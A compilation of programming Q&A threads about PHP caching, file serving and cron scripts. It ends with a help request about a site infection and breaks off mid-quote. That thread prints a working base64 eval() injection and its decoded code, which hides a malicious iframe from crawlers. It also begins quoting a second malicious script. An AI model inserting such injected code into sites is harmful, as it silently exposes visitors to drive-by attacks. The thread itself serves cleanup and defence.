Fault-tolerant file_get_contents - php

I have a website with the following architecture:
End user --(web browser)--> Server A (PHP) --(file_get_contents)--> Server B (ASP.NET & Database)
Server A is a simple web server, mostly serving static HTML pages. However, some content is dynamic, and this content is fetched from Server B. Example:
someDynamicPageOnServerA.php:
<html>
...static stuff...
<?php echo file_get_contents("http://serverB/somePage.aspx?someParameter"); ?>
...more static stuff...
</html>
This works fine. However, if Server B is down (maintenance, unexpected crash, etc.), those dynamic pages on Server A will fail. Thus, I'd like to
cache the last result of file_get_contents and
show this cached result if file_get_contents times out.
Now, it shouldn't be too hard to implement something like this; however, it seems like a common scenario and I'd like to avoid re-inventing the wheel. Is there some PHP library or built-in feature that helps with such a scenario?

I would do something like this:
function GetServerStatus($site, $port) {
    $fp = @fsockopen($site, $port, $errno, $errstr, 2);
    if (!$fp) {
        return false;
    } else {
        return true;
    }
}

$tempfile = '/some/temp/file/path.txt';
if (GetServerStatus('ServerB', 80)) {
    $content = file_get_contents("http://serverB/somePage.aspx?someParameter");
    file_put_contents($tempfile, $content);
    echo $content;
} else {
    echo file_get_contents($tempfile);
}

You could check the modified time of the cache file and only request the remote page when the cache has expired; otherwise load the local copy. There is also a cache pseudo-example on the PHP website in the comments for filemtime (from: http://php.net/manual/en/function.filemtime.php):
<?php
$cache_file = 'URI to cache file';
$cache_life = 120; // caching time, in seconds
$filemtime = @filemtime($cache_file); // returns FALSE if file does not exist
if (!$filemtime or (time() - $filemtime >= $cache_life)) {
    ob_start();
    resource_consuming_function();
    file_put_contents($cache_file, ob_get_flush());
} else {
    readfile($cache_file);
}
?>
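The same pattern can be adapted to the original question so that the remote page is only re-fetched when the cached copy is stale, and the stale copy is still served if the fetch fails. A minimal sketch, where the cache path and timings are only placeholders:
<?php
$cache_file = '/tmp/serverB_somePage.cache'; // placeholder path
$cache_life = 120;                           // seconds before attempting a refresh
$url = "http://serverB/somePage.aspx?someParameter";

$filemtime = @filemtime($cache_file);        // FALSE if the cache file does not exist
if (!$filemtime || (time() - $filemtime >= $cache_life)) {
    $fresh = @file_get_contents($url);       // may fail if Server B is down
    if ($fresh !== false) {
        file_put_contents($cache_file, $fresh);
    }
}
// Serve whatever we have; this falls back to the last good copy if the refresh failed
// (and outputs nothing if there has never been a successful fetch).
@readfile($cache_file);
?>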

I accepted dom's answer, since it was the most helpful one. I ended up using a slightly different approach, since I wanted to account for the situation where the server is reachable via port 80 but some other problem prevents it from serving the requested information.
function GetCachedText($url, $cachefile, $timeout) {
    $context = stream_context_create(array(
        'http' => array('timeout' => $timeout))); // set (short) timeout
    $contents = file_get_contents($url, false, $context);
    // $http_response_header is only populated when a response was actually received
    $status = isset($http_response_header)
        ? explode(" ", $http_response_header[0]) // e.g. HTTP/1.1 200 OK
        : array("", "0");
    if ($contents === false || $status[1] != "200") {
        $contents = file_get_contents($cachefile); // load from cache
    } else {
        file_put_contents($cachefile, $contents); // update cache
    }
    return $contents;
}
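Usage then looks something like this (the cache path and the two-second timeout are just placeholders):
echo GetCachedText("http://serverB/somePage.aspx?someParameter",
                   "/tmp/somePage.cache", 2);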

Related

Characters being dropped retrieving files from simple php service using WinHttpReadData

I have a simple PHP service set up on an IIS web server. It is used by my client to retrieve files from the server. It looks like this:
<?php
if (isset($_GET['file']))
{
    $filepath = "C:\\files\\" . $_GET['file'];
    if (!strpos(pathinfo($filepath, PATHINFO_DIRNAME), "..") && file_exists($filepath) && !is_dir($filepath))
    {
        set_time_limit(0);
        $fp = @fopen($filepath, "rb");
        while (!feof($fp))
        {
            print(@fread($fp, 1024*8));
            ob_flush();
            flush();
        }
    }
    else
    {
        echo "ERROR at www.testserver.com\r\n";
    }
    exit;
}
?>
I retrieve the files using WinHttp's WinHttpReadData in C++.
EDIT #2: Here is the C++ code. This is not exactly how it appears in my program. I had to pull pieces from multiple classes, but the gist should be apparent.
session = WinHttpOpen(appName.c_str(), WINHTTP_ACCESS_TYPE_NO_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
if (session) connection = WinHttpConnect(session, hostName.c_str(), INTERNET_DEFAULT_HTTP_PORT, 0);
if (connection) request = WinHttpOpenRequest(connection, NULL, requestString.c_str(), NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);

bool results = false;
if (request)
{
    results = (WinHttpSendRequest(request, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0) != FALSE);
}
if (results)
{
    results = (WinHttpReceiveResponse(request, NULL) != FALSE);
}

DWORD bytesCopied = 0;
DWORD size = 0;
if (results)
{
    do {
        results = (WinHttpQueryDataAvailable(request, &size) != FALSE);
        if (results)
        {
            // More available data?
            if (size > 0)
            {
                // Read the Data.
                size = min(bufferSize, size);
                ZeroMemory(buffer, size);
                results = (WinHttpReadData(request, (LPVOID)buffer, size, &bytesCopied) != FALSE);
            }
        }
        if (bytesCopied > 0 && !SharedShutDown.GetValue())
        {
            tempFile.write((PCHAR)RequestBuffer, bytesCopied);
            if (tempFile.fail())
            {
                tempFile.close();
                return false;
            }
            fileBytes += bytesCopied;
        }
    } while (bytesCopied > 0 && !SharedShutDown.GetValue());
}
Everything works fine when I test (thousands of files) over the local network using the server computer name from either a Windows 7 or Windows 10 machine. It also works fine when I access the service over the internet from a Windows 7 machine. However, when I run the client on a Windows 10 machine accessing over the internet, I get dropped characters. The interesting thing is that it is a specific set of characters that gets dropped every time from XML files. (Other, binary, files are affected as well, but I have not yet determined what changes in them.)
If the XML file contains an element starting with "<Style", that text disappears. So, this:
<Element1>blah blah</Element1>
<Style_Element>hoopa hoopa</Style_Element>
<Element2>bip bop bam</Element2>
becomes this:
<Element1>blah blah</Element1>
_Element>hoopa hoopa</Style_Element>
<Element2>bip bop bam</Element2>
Notice that the beginning of the style element is chopped off. This is the only element that is affected, and it seems to only affect the first one if there are more than one in the file.
What perplexes me is why this doesn't happen running the client from Windows 7.
EDIT: Some of the other files, binary and text, are missing from 1 to 3 characters each. It seems that a drop only happens once in a file. The rest of the contents of the file are identical to the source.
I can't make sense of the above read routine; it is also incomplete. Just keep it simple, like the example below.
The fact that you are having problems with binary files suggests you are not opening the output tempFile in binary mode.
std::ofstream tempFile(filename, std::ios::binary);
while (WinHttpQueryDataAvailable(request, &size) && size)
{
    std::string buf(size, 0);
    WinHttpReadData(request, &buf[0], size, &bytesCopied);
    tempFile.write(buf.data(), bytesCopied);
}
Your php file can be simplified as follows:
<?php
readfile('whatever.bin');
?>
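If you want to send explicit headers as well (which, as the update below shows, turned out to matter in this setup), a slightly fuller sketch might look like this; it assumes $filepath has already been validated exactly as in the question:
<?php
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($filepath));
readfile($filepath); // readfile() streams the file to the client binary-safe in one call
?>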
I solved the problem, it seems. My php service did not include header information (didn't think I needed it), so I figured I would try adding a header specification for content type application/octet-stream just to see what would result. My updated service looked like this:
if (isset($_GET['file']))
{
    $filepath = "C:\\Program Files (Unrestricted)\\Sony Online Entertainment\\Everquest Yarko Client\\" . $_GET['file'];
    if (!strpos(pathinfo($filepath, PATHINFO_DIRNAME), "..") && file_exists($filepath) && !is_dir($filepath))
    {
        header("Content-Type: application/octet-stream");
        set_time_limit(0);
        $fp = @fopen($filepath, "rb");
        while (!feof($fp))
        {
            print(@fread($fp, 1024*8));
            ob_flush();
            flush();
        }
    }
    else
    {
        echo "ERROR at www.lewiefitz.com\r\n";
    }
    exit;
}
Now the files download without any corruption. Why I need such a header in this situation is beyond me. What part of the system is messing with the response message before it ends up in my buffer? I don't know.

Automatically create cache file with php

I have been using a basic caching system on my site based on this link.
It has so far worked well for everything I want to do.
$cachefile = 'cache/' . basename($_SERVER['QUERY_STRING']) . '.html';
$cachetime = 1440 * 60;
if (file_exists($cachefile) && (time() - $cachetime < filemtime($cachefile))) {
    include($cachefile);
    echo "<!-- Cached " . date('jS F Y H:i', filemtime($cachefile)) . " -->";
    exit;
}
ob_start();
// My html/php code here
$fp = fopen($cachefile, 'w');   // open the cache file for writing
fwrite($fp, ob_get_contents()); // save the contents of output buffer to the file
fclose($fp);                    // close
ob_end_flush();                 // Send to browser
However, I have a couple of pages with more complex MySQL queries. I have spent a fair bit of time optimising them, yet they still take about 10 seconds to run when I query them in MySQL, and even longer on the website. Sometimes the page seems to time out, as I get the message below.
The proxy server received an invalid response from an upstream server.
The proxy server could not handle the requestGET http://www.example.com
Reason: Error reading from remote server
This isn't a huge issue because, with the caching system above, only the first person to open the page each day gets the delay; everyone else gets the cached page, so it is actually quite fast for them.
I want to save myself from having to be that first visitor each day and automate the process, so that at 17:00 (server time) each day the file gets written to the cache.
How would I best achieve this?
I suggest you use PHP Speedy, or this may help:
<?php
function getUrl() {
    if (isset($_SERVER['REQUEST_URI'])) {
        $url = $_SERVER['REQUEST_URI'];
    } else {
        $url = $_SERVER['SCRIPT_NAME'];
        $url .= (!empty($_SERVER['QUERY_STRING'])) ? '?' . $_SERVER['QUERY_STRING'] : '';
    }
    return $url;
}
// getUrl returns the queried page including the query string

function cache($buffer) { // the page's content is $buffer
    $url = getUrl();
    $filename = md5($url) . '.cache';
    $data = time() . '¦' . $buffer;
    $filew = fopen("cache/" . $filename, 'w');
    fwrite($filew, $data);
    fclose($filew);
    return $buffer;
}

function display() {
    $url = getUrl();
    $filename = md5($url) . '.cache';
    if (!file_exists("cache/" . $filename)) {
        return false;
    }
    $filer = fopen("cache/" . $filename, 'r');
    $data = fread($filer, filesize("cache/" . $filename));
    fclose($filer);
    $content = explode('¦', $data, 2);
    if (count($content) != 2 OR !is_numeric($content[0])) {
        return false;
    }
    if (time() - 100 > $content[0]) { // 100 is the cache lifetime, in seconds
        return false;
    }
    echo $content[1];
    die();
}

// Display cache (if any)
display(); // if a cached copy is displayed, die() ends the program here.
// if there is no cache, register cache() as the output callback
ob_start('cache');
?>
Just include this script anywhere you need caching and set up a cron job to run it automatically.
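For the 17:00 refresh specifically, one approach (assuming cron and wget are available on the server; the URL is a placeholder) is to have cron request the slow page once a day, so the caching code rebuilds the file before any real visitor hits it:
# crontab entry: warm the cache every day at 17:00 server time
0 17 * * * wget -q -O /dev/null "http://www.example.com/slow-page.php"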

Replace drops characters

I have a script I use that checks the IP address stored within my hosts.allow file against the IP mapped to my DynDNS hostname, so I can log into my servers once I've synced my current IP to that hostname. For some reason, though, the script seems to cause really intermittent issues.
Within my hosts.allow file I have a section like this:
#SOme.gotdns.com
sshd : 192.168.0.1
#EOme.gotdns.com
#SOme2.gotdns.com
sshd : 192.168.0.2
#EOme2.gotdns.com
I have a script running on a cron (every minute) that looks like this:
#!/usr/bin/php
<?php
$hosts = array('me.gotdns.com','me2.gotdns.com');
foreach ($hosts as $host)
{
    $ip = gethostbyname($host);
    $replaceWith = "#SO".$host."\nsshd : ".$ip."\n#EO".$host;
    $filename = '/etc/hosts.allow';
    $handle = fopen($filename,'r');
    $contents = fread($handle, filesize($filename));
    fclose($handle);
    if (preg_match('/#SO'.$host.'(.*?)#EO'.$host.'/si', $contents, $regs))
    {
        $result = $regs[0];
    }
    if ($result != $replaceWith)
    {
        $newcontents = str_replace($result,$replaceWith,$contents);
        $handle = fopen($filename,'w');
        if (fwrite($handle, $newcontents) === FALSE) {
        }
        fclose($handle);
    }
}
?>
The problem I have is that intermittently characters are being dropped (I assume during the replace), which causes future updates to fail because it inserts something like:
#SOme.gotdns.com
sshd : 192.168.0.1
#EOme.gotdn
Note the missing "s.com".
This of course means I lose access to the server. Any ideas why this would be happening?
Thanks.
That might be because the script's execution time is too long, or the 1-minute interval is too short. While cron is doing the job, another instance of the script starts, and it may affect the first one.
This is almost certainly because the script hasn't finished executing within the one-minute period before it's started again via cron. You need to implement some sort of locking, or use a tool that only allows one instance of the script to run. There are several tools available out there that can do this, for example lockrun.
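For example, on Linux systems with util-linux installed, flock(1) can provide that single-instance guarantee straight from the crontab (the lock file and script path are placeholders):
* * * * * /usr/bin/flock -n /tmp/hosts_allow.lock /usr/bin/php /path/to/update_hosts.php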
I would say that in order to do this safely, you should acquire an exclusive lock on the file at the beginning of the script, read it all into memory once, modify it in memory, then write it back to the file at the end. This would also be considerably more efficient in terms of disk I/O.
You should also alter the cron job to run less frequently. It is likely that you currently have this problem because two processes are running at the same time; if that is the case, then by locking the file you risk having processes stack up waiting to acquire the lock. Running it every 5 minutes should be good enough - your IP shouldn't change that often!
So do this (FIXED):
#!/usr/bin/php
<?php

// Settings
$hosts = array(
    'me.gotdns.com',
    'me2.gotdns.com'
);
$filename = '/etc/hosts.allow';

// No time limit (shouldn't be necessary with CLI, but just in case)
set_time_limit(0);

// Open the file in read/write mode and lock it
// flock() should block until it gets a lock
if (!($handle = fopen($filename, 'r+')) || !flock($handle, LOCK_EX)) exit(1);

// Read the file
if (($contents = fread($handle, filesize($filename))) === FALSE) exit(1);

// Will be set to true if we actually make any changes to the file
$changed = FALSE;

// Loop hosts list
foreach ($hosts as $host) {

    // Get current IP address of host
    if (($ip = gethostbyname($host)) == $host) continue;

    // Find the entry in the file
    $replaceWith = "#SO{$host}\nsshd : {$ip}\n#EO{$host}";
    if (preg_match("/#SO{$host}(.*?)#EO{$host}/si", $contents, $regs)) {
        // Only do this if there was a match - otherwise risk overwriting previous
        // entries because you didn't reset the value of $result
        if ($regs[0] != $replaceWith) {
            $changed = TRUE;
            $contents = str_replace($regs[0], $replaceWith, $contents);
        }
    }
}

// We'll only change the contents of the file if the data changed
if ($changed) {
    ftruncate($handle, 0);      // Zero the length of the file
    rewind($handle);            // start writing from the beginning
    fwrite($handle, $contents); // write the new data
}

flock($handle, LOCK_UN); // Unlock
fclose($handle);         // close
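And in the crontab, run it every 5 minutes instead of every minute (the script path is a placeholder):
*/5 * * * * /usr/bin/php /root/scripts/update_hosts_allow.php > /dev/null 2>&1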

webpage caching

I am looking for the best solution for caching my web pages, for example http://www.website.com/test.php?d=2011-11-01, which has a URL rewrite rule turning it into http://www.website.com/testd-2011-11-01.html.
The script below does not work for dynamic web pages; it gives the same page regardless of the query.
<?php
$cachefile = "cache/" . $reqfilename . ".html";
$cachetime = 240 * 60; // 240 minutes

// Serve from the cache if it is younger than $cachetime
if (file_exists($cachefile) && (time() - $cachetime < filemtime($cachefile)))
{
    include($cachefile);
    echo "<!-- Cached " . date('jS F Y H:i', filemtime($cachefile)) . " -->";
    exit;
}
ob_start(); // start the output buffer
?>
my website content here
<?php
// open the cache file for writing
$fp = fopen($cachefile, 'w');
// save the contents of output buffer to the file
fwrite($fp, ob_get_contents());
// close the file
fclose($fp);
// Send the output to the browser
ob_end_flush();
?>
If your URL looks like testd-2011-11-01.html, you have two possible solutions:
Use a RewriteRule so that the URL is rewritten to test.php?d=2011-11-01; then your test.php script can deal with cache generation / invalidation.
Or use a cronjob that regenerates the testd-2011-11-01.html static file every X minutes.
The first solution is the one that's generally used, as it only requires you to set up a RewriteRule (and those are often available, even on cheap hosting services).
The second solution might be a bit better for performance (no PHP code is ever executed except when the cronjob runs); but the difference is probably not that important, unless you have a very big website with an awful lot of users.
Something like this could work:
class SimpleCache {
    private $_cacheDir  = '/path/to/cache';
    private $_cacheTime = 240 * 60;

    public function isCached($id) {
        $cacheFilename = $this->_cacheDir . "/" . $id . "_*";
        $files = glob($cacheFilename, GLOB_NOSORT);
        if ($files && !empty($files)) {
            // There should always be one file in the array
            $filename  = $files[0];
            $params    = explode("_", $filename);
            $cacheTime = strtok($params[1], '.');
            // Check if the cached file is too old
            if (time() - $cacheTime > $this->_cacheTime) {
                @unlink($filename);
            } else {
                return $filename;
            }
        }
        return false;
    }

    public function cache($id, $data) {
        $filename = $this->_cacheDir . "/" . $id . "_" . time() . ".cache";
        if (!($fp = @fopen($filename, "w"))) {
            return false;
        }
        if (!@fwrite($fp, $data)) {
            @fclose($fp);
            return false;
        }
        @fclose($fp);
        return true;
    }
}

$cache = new SimpleCache();
if (($cachedFile = $cache->isCached($reqfilename)) !== false) {
    $buffer = file_get_contents($cachedFile); // serve the cached copy
} else {
    // Produce the contents of the page and save them in the $buffer variable
    $cache->cache($reqfilename, $buffer);
}
echo $buffer;
But you could use memcached, APC, and more advanced caching techniques if you are up to it.
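For instance, with the Memcached extension the file handling disappears entirely. A minimal sketch, where the server address, the key prefix and the build_page_contents() helper are all assumptions:
$mc = new Memcached();
$mc->addServer('127.0.0.1', 11211);

$key    = 'page_' . md5($reqfilename);
$buffer = $mc->get($key);
if ($buffer === false) {
    $buffer = build_page_contents();   // hypothetical page generator
    $mc->set($key, $buffer, 240 * 60); // cache for 240 minutes
}
echo $buffer;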
You can use HTTP caching. You send headers telling the client (browser) to cache the whole page for a certain period of time.
// 5 minutes
header('Cache-Control: max-age=300');
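A slightly fuller sketch, if you also want an explicit Expires date to accompany the max-age (both values here are the same 5 minutes):
header('Cache-Control: public, max-age=300');
header('Expires: ' . gmdate('D, d M Y H:i:s', time() + 300) . ' GMT');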
If you have control over your hosting environment, you can also add a reverse proxy like varnish or nginx in front of your webserver. This proxy will then cache these requests for you, making the cached version shared between all visitors of your site.
See also the HTTP/1.1 specification.

How to get rid of eval-base64_decode like PHP virus files?

My site (a very large community website) was recently infected with a virus. Every index.php file was changed so that its opening PHP tag became the following line:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));
When I decoded this, it produced the following PHP code:
<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
}
I've tried several things to clean out the virus, even restoring from a backup, but the files get re-infected after a few minutes or hours. So can you please help me?
What do you know about this virus?
Is there a known security hole it uses to install and propagate?
What does the above PHP code actually do?
What does the page it embeds in the iframe do?
And of course, more importantly: what can I do to get rid of it?
Please help, we have almost run out of ideas and hope :(
UPDATE 1
Some more details: a weird thing is that when we first checked the infected files, they had been changed, but the modified time shown in the FTP program was days, months or even years in the past in some cases! How is this even possible? It drives me crazy!
UPDATE 2
I think the problem originated after a user installed a plugin in his WordPress installation. After restoring from backup and completely deleting the WordPress folder and the associated DB, the problem seems to be gone. We have since subscribed to a security service and they are investigating the issue, just to be sure the hack is gone for good. Thanks to everyone who replied.
Steps to recover and disinfect your site (provided you have a known good backup).
1) Shutdown the Site
You need to basically close the door to your site before you do your remedial work. This will prevent visitors getting malicious code, seeing error messages, etc. Just good practice.
You should be able to do this by putting the following into your .htaccess file in the webroot. (Replace "!!Your IP Address Here!!" with your own IP address - see http://icanhazip.com if you don't know your IP address.)
order deny,allow
deny from all
allow from !!Your IP Address Here!!
2) Download a Copy of All of your Files from the Server
Download everything into a separate folder from your good backups. This may take a while (dependent on your site size, connection speed, etc).
3) Download and Install a File/Folder Comparison Utility
On a Windows machine, you can use WinMerge - http://winmerge.org/ - it's free and quite powerful.
On a MacOS machine, check out the list of possible alternates from Alternative.to
4) Run the File/Folder Comparison Utility
You should end up with a few different results:
Files are Identical - The current file is the same as your backup, and so is unaffected.
File on Left/Right Side Only - That file either only exists in the backup (and may have been deleted from the server), or only exists on the server (and may have been injected/created by the hacker).
File is Different - The file on the server is not the same as the one in the backup, so it may have been modified by you (to configure it for the server) or by the hacker (to inject code).
5) Resolve the Differences
(a.k.a "Why can't we all just get along?")
For Files which are Identical, no further action is required.
For Files which Exist on One Side Only, look at the file and figure out whether it is legitimate (i.e. user uploads which should be there, additional files you may have added, etc.).
For Files which are Different, look at the file (the File Difference Utility may even show you which lines have been added/modified/removed) and see whether the server version is valid. Overwrite (with the backed-up version) any files which contain malicious code.
6) Review your Security Precautions
Whether this is as simple as changing your FTP/cPanel passwords, or reviewing your use of external/uncontrolled resources (as you mention you are performing a lot of fgets, fopen, etc. calls, you may want to check the parameters being passed to them, as that is one way to make scripts pull in malicious code), etc.
7) Check the Site Works
Take the opportunity of being the only person looking at the site to make sure that everything is still operating as expected, after the infected files are corrected and malicious files have been removed.
8) Open the Doors
Reverse the changes made in the .htaccess file in Step 1. Watch carefully. Keep an eye on your visitor and error logs to see if anyone tries to trigger the removed malicious files, etc.
9) Consider Automated Detection Methods
There are a few solutions that allow you to have an automated check performed on your host (using a cron job) which will detect and detail any changes that occur. Some are a bit verbose (you will get an email for each and every file changed), but you should be able to adapt them to your needs:
Tripwire - a PHP script to detect and report new, deleted or modified files
Shell script to monitor file changes
How to detect if your webserver is hacked and get alerted
10) Have Scheduled Backups, and Retain a Good Bracket
Make sure you have scheduled backups performed on your website, keep a few of them, so you have different steps you can go back in time, if necessary. For instance, if you performed weekly backups, you might want to keep the following:
4 x Weekly Backups
4 x Monthly Backups (you retain one of the Weekly Backups, maybe the first week of the month, as the Monthly Backup)
These will always make life easier if you have someone attack your site with something a bit more destructive than a code injection attack.
Oh, and ensure you back up your databases too - with a lot of sites being based on CMSes, having the files is nice, but if you lose or corrupt the database behind them, the backups are basically useless.
I suffered from the same hack. I was able to decrypt the code as well, and while I got different PHP code, I started by removing the injected PHP text by looping through each PHP file in the site and removing the eval call. I am still investigating how I got it to begin with, but here is what mine looked like after decrypting it.
To decode the encrypted PHP script in each PHP file, use this:
http://www.opinionatedgeek.com/dotnet/tools/base64decode/
And format the result using this:
http://beta.phpformatter.com/
To clean up, you need to remove the "eval" line from the top of each PHP file and delete the .log folders from the base folder of the website.
I found a Python script which I modified slightly to remove the trojan from PHP files, so I will post it here for others to use:
code source from thread: replace ALL instances of a character with another one in all files hierarchically in directory tree
import os
import re
import sys

# only .php files are rewritten (flag is referenced below; define it here)
replace_extensions = True

def try_to_replace(fname):
    if replace_extensions:
        return fname.lower().endswith(".php")
    return True

def file_replace(fname, pat, s_after):
    # first, see if the pattern is even in the file.
    with open(fname) as f:
        if not any(re.search(pat, line) for line in f):
            return # pattern does not occur in file so we are done.

    # pattern is in the file, so perform replace operation.
    with open(fname) as f:
        out_fname = fname + ".tmp"
        out = open(out_fname, "w")
        for line in f:
            out.write(re.sub(pat, s_after, line))
        out.close()
        os.rename(out_fname, fname)

def mass_replace(dir_name, s_before, s_after):
    pat = re.compile(s_before)
    for dirpath, dirnames, filenames in os.walk(dir_name):
        for fname in filenames:
            if try_to_replace(fname):
                print "cleaning: " + fname
                fullname = os.path.join(dirpath, fname)
                file_replace(fullname, pat, s_after)

if len(sys.argv) != 2:
    u = "Usage: rescue.py <dir_name>\n"
    sys.stderr.write(u)
    sys.exit(1)

mass_replace(sys.argv[1], "eval\(base64_decode\([^.]*\)\);", "")
To use it, type:
python rescue.py rootfolder
This is what the malicious script was trying to do:
<?php
if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
if (!function_exists('mrobh')) {
function get_tds_777($url)
{
$content = "";
